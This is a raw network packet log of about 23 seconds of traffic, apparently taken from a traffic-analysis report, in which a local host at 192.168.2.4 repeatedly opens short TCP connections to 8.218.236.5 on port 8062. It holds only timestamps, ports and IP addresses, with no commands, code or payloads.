Apr 19, 2024 09:50:43.249769926 CEST	8062	49789	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:43.251593113 CEST	8062	49789	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:43.251614094 CEST	8062	49789	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:43.251832962 CEST	49789	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:43.251964092 CEST	49789	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:43.370549917 CEST	49790	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:43.585061073 CEST	8062	49789	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:43.696611881 CEST	8062	49790	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:43.696747065 CEST	49790	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:43.697031021 CEST	49790	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:44.023109913 CEST	8062	49790	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:44.026570082 CEST	8062	49790	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:44.026648998 CEST	8062	49790	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:44.026726007 CEST	49790	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:44.026767969 CEST	49790	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:44.026979923 CEST	49790	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:44.142893076 CEST	49791	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:44.352936983 CEST	8062	49790	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:44.460136890 CEST	8062	49791	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:44.460318089 CEST	49791	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:44.460520983 CEST	49791	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:44.777589083 CEST	8062	49791	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:44.779476881 CEST	8062	49791	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:44.779504061 CEST	8062	49791	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:44.779689074 CEST	49791	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:44.779863119 CEST	49791	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:44.894226074 CEST	49792	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:45.097944021 CEST	8062	49791	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:45.213592052 CEST	8062	49792	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:45.213833094 CEST	49792	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:45.214190006 CEST	49792	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:45.536998034 CEST	8062	49792	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:45.538546085 CEST	8062	49792	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:45.538589001 CEST	8062	49792	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:45.538887024 CEST	49792	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:45.539031982 CEST	49792	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:45.643568993 CEST	49793	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:45.858164072 CEST	8062	49792	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:45.962933064 CEST	8062	49793	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:45.963280916 CEST	49793	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:45.963610888 CEST	49793	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:46.281589985 CEST	8062	49793	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:46.283365011 CEST	8062	49793	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:46.283387899 CEST	8062	49793	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:46.283449888 CEST	49793	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:46.283473969 CEST	49793	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:46.283593893 CEST	49793	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:46.394572020 CEST	49794	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:46.601651907 CEST	8062	49793	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:46.709793091 CEST	8062	49794	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:46.710086107 CEST	49794	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:46.710241079 CEST	49794	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:47.025135994 CEST	8062	49794	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:47.027081013 CEST	8062	49794	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:47.027096987 CEST	8062	49794	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:47.027143955 CEST	49794	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:47.027175903 CEST	49794	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:47.027347088 CEST	49794	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:47.142203093 CEST	49795	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:47.342272997 CEST	8062	49794	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:47.470010996 CEST	8062	49795	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:47.470117092 CEST	49795	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:47.481498957 CEST	49795	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:47.808495998 CEST	8062	49795	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:47.810244083 CEST	8062	49795	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:47.810292959 CEST	8062	49795	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:47.810307980 CEST	49795	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:47.810338974 CEST	49795	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:47.810484886 CEST	49795	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:47.923913956 CEST	49796	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:48.137379885 CEST	8062	49795	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:48.242319107 CEST	8062	49796	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:48.242454052 CEST	49796	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:48.242646933 CEST	49796	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:48.561069012 CEST	8062	49796	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:48.562959909 CEST	8062	49796	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:48.563002110 CEST	8062	49796	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:48.563046932 CEST	49796	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:48.563079119 CEST	49796	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:48.563431025 CEST	49796	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:48.674138069 CEST	49797	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:48.881675959 CEST	8062	49796	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:48.999699116 CEST	8062	49797	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:48.999839067 CEST	49797	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:49.000065088 CEST	49797	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:49.325450897 CEST	8062	49797	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:49.327081919 CEST	8062	49797	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:49.327126026 CEST	8062	49797	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:49.327182055 CEST	49797	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:49.327219963 CEST	49797	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:49.327501059 CEST	49797	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:49.439662933 CEST	49798	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:49.654438019 CEST	8062	49797	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:49.758407116 CEST	8062	49798	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:49.758599043 CEST	49798	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:49.758795977 CEST	49798	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:50.075490952 CEST	8062	49798	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:50.077326059 CEST	8062	49798	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:50.077341080 CEST	8062	49798	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:50.077400923 CEST	49798	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:50.077672005 CEST	49798	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:50.188971996 CEST	49799	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:50.394304991 CEST	8062	49798	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:50.518318892 CEST	8062	49799	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:50.518419981 CEST	49799	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:50.518590927 CEST	49799	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:50.847599983 CEST	8062	49799	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:50.849447012 CEST	8062	49799	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:50.849489927 CEST	8062	49799	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:50.849659920 CEST	49799	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:50.849782944 CEST	49799	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:50.959265947 CEST	49800	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:51.178819895 CEST	8062	49799	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:51.275137901 CEST	8062	49800	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:51.275259018 CEST	49800	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:51.275449991 CEST	49800	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:51.591022968 CEST	8062	49800	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:51.592808962 CEST	8062	49800	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:51.592849970 CEST	8062	49800	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:51.592928886 CEST	49800	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:51.592928886 CEST	49800	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:51.595014095 CEST	49800	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:51.704341888 CEST	49801	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:51.914421082 CEST	8062	49800	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:52.027427912 CEST	8062	49801	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:52.027645111 CEST	49801	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:52.027801037 CEST	49801	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:52.350769043 CEST	8062	49801	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:52.352518082 CEST	8062	49801	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:52.352561951 CEST	8062	49801	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:52.352633953 CEST	49801	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:52.352719069 CEST	49801	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:52.352782965 CEST	49801	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:52.470181942 CEST	49802	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:52.675642967 CEST	8062	49801	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:52.779078960 CEST	8062	49802	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:52.779179096 CEST	49802	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:52.779481888 CEST	49802	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:53.088208914 CEST	8062	49802	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:53.090070963 CEST	8062	49802	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:53.090102911 CEST	8062	49802	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:53.090251923 CEST	49802	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:53.090251923 CEST	49802	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:53.090342999 CEST	49802	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:53.204647064 CEST	49803	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:53.399126053 CEST	8062	49802	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:53.525532961 CEST	8062	49803	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:53.525692940 CEST	49803	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:53.525871038 CEST	49803	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:53.846504927 CEST	8062	49803	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:53.848320961 CEST	8062	49803	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:53.848361969 CEST	8062	49803	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:53.848404884 CEST	49803	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:53.848452091 CEST	49803	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:53.848560095 CEST	49803	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:53.959512949 CEST	49804	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:54.169162035 CEST	8062	49803	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:54.278914928 CEST	8062	49804	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:54.279133081 CEST	49804	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:54.279217005 CEST	49804	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:54.598290920 CEST	8062	49804	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:54.600039005 CEST	8062	49804	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:54.600084066 CEST	8062	49804	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:54.600140095 CEST	49804	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:54.600140095 CEST	49804	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:54.600250006 CEST	49804	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:54.705158949 CEST	49805	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:54.920013905 CEST	8062	49804	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:55.029984951 CEST	8062	49805	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:55.030142069 CEST	49805	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:55.030407906 CEST	49805	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:55.354913950 CEST	8062	49805	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:55.357326984 CEST	8062	49805	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:55.357364893 CEST	8062	49805	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:55.357409000 CEST	49805	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:55.357450962 CEST	49805	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:55.357589960 CEST	49805	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:55.470293045 CEST	49807	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:55.681905985 CEST	8062	49805	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:55.794069052 CEST	8062	49807	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:55.794161081 CEST	49807	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:55.794430017 CEST	49807	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:56.117943048 CEST	8062	49807	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:56.120906115 CEST	8062	49807	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:56.120950937 CEST	8062	49807	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:56.120990992 CEST	49807	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:56.121026993 CEST	49807	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:56.121118069 CEST	49807	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:56.236478090 CEST	49808	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:56.444631100 CEST	8062	49807	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:56.556016922 CEST	8062	49808	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:56.556128025 CEST	49808	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:56.556394100 CEST	49808	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:56.875783920 CEST	8062	49808	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:56.877624035 CEST	8062	49808	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:56.877665997 CEST	8062	49808	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:56.877686024 CEST	49808	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:56.877731085 CEST	49808	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:56.877888918 CEST	49808	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:56.986089945 CEST	49809	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:57.197196007 CEST	8062	49808	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:57.319785118 CEST	8062	49809	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:57.320344925 CEST	49809	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:57.320543051 CEST	49809	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:57.655700922 CEST	8062	49809	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:57.657228947 CEST	8062	49809	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:57.657298088 CEST	8062	49809	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:57.657345057 CEST	49809	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:57.657524109 CEST	49809	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:57.657524109 CEST	49809	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:57.767802954 CEST	49810	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:57.992043018 CEST	8062	49809	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:58.090399981 CEST	8062	49810	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:58.090501070 CEST	49810	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:58.090668917 CEST	49810	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:58.412955046 CEST	8062	49810	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:58.414830923 CEST	8062	49810	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:58.414896965 CEST	8062	49810	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:58.414915085 CEST	49810	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:58.414952993 CEST	49810	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:58.415028095 CEST	49810	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:58.532762051 CEST	49811	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:58.737200975 CEST	8062	49810	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:58.868169069 CEST	8062	49811	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:58.868390083 CEST	49811	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:58.868501902 CEST	49811	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:59.204262018 CEST	8062	49811	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:59.205900908 CEST	8062	49811	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:59.205966949 CEST	8062	49811	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:59.205995083 CEST	49811	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:59.206084967 CEST	49811	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:59.206108093 CEST	49811	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:59.313610077 CEST	49812	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:59.544397116 CEST	8062	49811	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:59.647408962 CEST	8062	49812	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:59.647531033 CEST	49812	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:59.647711039 CEST	49812	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:59.981575012 CEST	8062	49812	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:59.983263969 CEST	8062	49812	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:59.983284950 CEST	8062	49812	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:59.983407974 CEST	49812	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:59.983431101 CEST	49812	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:59.983587027 CEST	49812	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:00.095393896 CEST	49813	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:00.317595005 CEST	8062	49812	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:00.419241905 CEST	8062	49813	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:00.419367075 CEST	49813	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:00.419537067 CEST	49813	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:00.743439913 CEST	8062	49813	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:00.745043993 CEST	8062	49813	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:00.745088100 CEST	8062	49813	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:00.745115995 CEST	49813	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:00.745167017 CEST	49813	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:00.745227098 CEST	49813	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:00.861716032 CEST	49814	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:01.069228888 CEST	8062	49813	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:01.176986933 CEST	8062	49814	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:01.177110910 CEST	49814	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:01.177300930 CEST	49814	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:01.492161036 CEST	8062	49814	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:01.493992090 CEST	8062	49814	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:01.494012117 CEST	8062	49814	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:01.494223118 CEST	49814	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:01.494223118 CEST	49814	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:01.494268894 CEST	49814	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:01.611578941 CEST	49815	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:01.809092999 CEST	8062	49814	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:01.930493116 CEST	8062	49815	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:01.930815935 CEST	49815	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:01.930954933 CEST	49815	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:02.249578953 CEST	8062	49815	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:02.252291918 CEST	8062	49815	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:02.252314091 CEST	8062	49815	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:02.252384901 CEST	49815	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:02.252429962 CEST	49815	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:02.271928072 CEST	49815	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:02.377079964 CEST	49816	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:02.590802908 CEST	8062	49815	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:02.698359966 CEST	8062	49816	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:02.698462009 CEST	49816	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:02.703186035 CEST	49816	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:03.024382114 CEST	8062	49816	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:03.026295900 CEST	8062	49816	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:03.026316881 CEST	8062	49816	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:03.026365995 CEST	49816	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:03.026411057 CEST	49816	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:03.091136932 CEST	49816	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:03.206970930 CEST	49817	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:03.412481070 CEST	8062	49816	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:03.549750090 CEST	8062	49817	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:03.549866915 CEST	49817	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:04.088046074 CEST	49817	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:04.427303076 CEST	8062	49817	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:04.429053068 CEST	8062	49817	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:04.429095030 CEST	8062	49817	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:04.429147959 CEST	49817	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:04.429239035 CEST	49817	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:04.429300070 CEST	49817	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:04.532720089 CEST	49818	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:04.768389940 CEST	8062	49817	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:04.870351076 CEST	8062	49818	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:04.870630026 CEST	49818	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:04.870831966 CEST	49818	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:05.205101967 CEST	8062	49818	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:05.206963062 CEST	8062	49818	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:05.206984043 CEST	8062	49818	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:05.207052946 CEST	49818	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:05.207093000 CEST	49818	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:05.211869001 CEST	49818	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:05.341075897 CEST	49819	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:05.547352076 CEST	8062	49818	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:05.658998966 CEST	8062	49819	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:05.659132957 CEST	49819	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:05.659329891 CEST	49819	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:05.976726055 CEST	8062	49819	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:05.978637934 CEST	8062	49819	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:05.978667974 CEST	8062	49819	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:05.978710890 CEST	49819	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:05.978754997 CEST	49819	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:05.979033947 CEST	49819	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:06.128995895 CEST	49820	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:06.296510935 CEST	8062	49819	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:06.447559118 CEST	8062	49820	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:06.447674036 CEST	49820	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:06.447881937 CEST	49820	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:06.766638994 CEST	8062	49820	8.218.236.5	192.168.2.4
